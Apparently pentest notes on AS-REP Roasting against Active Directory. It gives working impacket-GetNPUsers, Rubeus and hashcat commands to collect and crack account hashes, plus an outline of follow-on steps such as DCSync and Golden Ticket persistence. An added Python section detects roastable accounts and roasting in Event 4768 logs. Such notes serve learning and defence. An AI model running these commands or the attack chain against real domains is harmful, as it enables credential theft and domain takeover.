
AS-REP Roasting


About The Attack

AD has a user account flag, "Do not require Kerberos preauthentication" (DONT_REQ_PREAUTH). If it is set, the DC does not validate the encrypted timestamp, skips preauthentication and answers the AS-REQ with an AS-REP straight away. The AS-REP response (carrying the TGT) is encrypted with the user's NTLM hash (derived from their password). Since an attacker can obtain this encrypted blob without authenticating, it can be brute-forced offline.

Performing Attack

Gear Up (Prereqs)

  • Domain Controller's IP
  • User:Pass for authentication

Using Impacket-GetNPUsers

This command is used when launching the attack from the Kali Linux machine:

impacket-GetNPUsers -dc-ip <DC-IP> -request -outputfile hashes.asreproast domain.com/user

Here user is the username for which you have credentials. For this attack you have two options: either pass a list of usernames with -usersfile users.txt for which you want to perform the AS-REP Roast, or use the method above, in which Impacket-GetNPUsers enumerates the users itself after authenticating.

Using Rubeus

This command is used when you have a Windows machine in the domain:

rubeus.exe asreproast /nowrap

Crack the Collected Hash

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

We can also use custom rules or any other suitable wordlist.
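As an added defender-side example (not part of the original notes), the following Python checks the two things the sections above imply: which accounts have DONT_REQ_PREAUTH set in userAccountControl (bit 0x400000), and which client IPs generated Event ID 4768 entries with Pre-Authentication Type 0 and RC4 (etype 0x17) for several accounts in a short window, which is the footprint the GetNPUsers/Rubeus requests leave on the DC. The userAccountControl values and event records are constructed sample data; the dictionary keys are assumed to mirror the 4768 event's XML field names.

```python
"""Defender-side checks for AS-REP Roasting.
Signal 1: accounts with DONT_REQ_PREAUTH (userAccountControl 0x400000)
          are the roastable population; list and review them.
Signal 2: Event ID 4768 with PreAuthType 0 and TicketEncryptionType 0x17
          (RC4, the etype hashcat mode 18200 cracks) for several distinct
          accounts from one client IP in a short window indicates a roasting run.
"""
from collections import defaultdict
from datetime import datetime, timedelta

DONT_REQ_PREAUTH = 0x400000  # userAccountControl flag
RC4_HMAC = 0x17              # Kerberos etype 23

def roastable_accounts(uac_by_user):
    """Users whose userAccountControl has DONT_REQ_PREAUTH set."""
    return sorted(u for u, uac in uac_by_user.items() if uac & DONT_REQ_PREAUTH)

def asrep_roast_sources(events, window=timedelta(minutes=5), min_accounts=3):
    """Client IPs that obtained no-preauth RC4 TGTs for >= min_accounts
    distinct users within `window`, mapped to the sorted account names."""
    by_ip = defaultdict(list)
    for e in events:
        if (e["EventID"] == 4768 and e["PreAuthType"] == 0
                and e["TicketEncryptionType"] == RC4_HMAC):
            by_ip[e["IpAddress"]].append((e["Time"], e["TargetUserName"]))
    hits = {}
    for ip, reqs in by_ip.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window starting at each event
            users = {u for t, u in reqs[i:] if t - t0 <= window}
            if len(users) >= min_accounts:
                hits[ip] = sorted(users)
                break
    return hits

# Constructed sample data (not from any real domain or log).
SAMPLE_UAC = {"svc_backup": 0x410200, "legacyapp": 0x400200,
              "printsvc": 0x400200, "jdoe": 0x10200}
T0 = datetime(2024, 1, 1, 9, 0, 0)
def _ev(secs, user, ip, preauth, etype):
    return {"EventID": 4768, "Time": T0 + timedelta(seconds=secs),
            "TargetUserName": user, "IpAddress": ip,
            "PreAuthType": preauth, "TicketEncryptionType": etype}
SAMPLE_4768 = [
    _ev(0, "svc_backup", "10.0.0.50", 0, 0x17),   # roasting run from one host
    _ev(1, "legacyapp", "10.0.0.50", 0, 0x17),
    _ev(2, "printsvc", "10.0.0.50", 0, 0x17),
    _ev(60, "jdoe", "10.0.0.21", 2, 0x12),        # normal logon: timestamp preauth, AES
]
```

Feeding real 4768 events in (e.g. parsed from Security.evtx) only requires mapping the same six fields; the threshold and window are tuning knobs for your environment.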

Further Actions

Below are some of the use cases after successfully cracking the hash.

Credential Reuse

  1. Password Spraying --> SMB/RDP/WinRM
  2. LDAP/Kerberos --> Enumerate Further
  3. VPN / Outlook Web Access / Citrix

Privilege Escalation

If the account belongs to:

  1. Domain Admins / Server Operators / Account Operators → instant escalation.
  2. Service Accounts (common) → pivoting into Kerberoasting, Silver Tickets, or lateral movement.
  3. Users with local admin rights → move laterally via SMB/PSExec/WinRM.

Chaining with Other Attacks

  1. From AS-REP → Kerberoasting.

     If the cracked account has SPNs, request service tickets and roast them.

  2. From AS-REP → DCSync.

     If the cracked account has replication privileges, dump all domain hashes.

  3. From AS-REP → Persistence.

     If it's a privileged service account, create Golden/Silver Tickets for long-term persistence.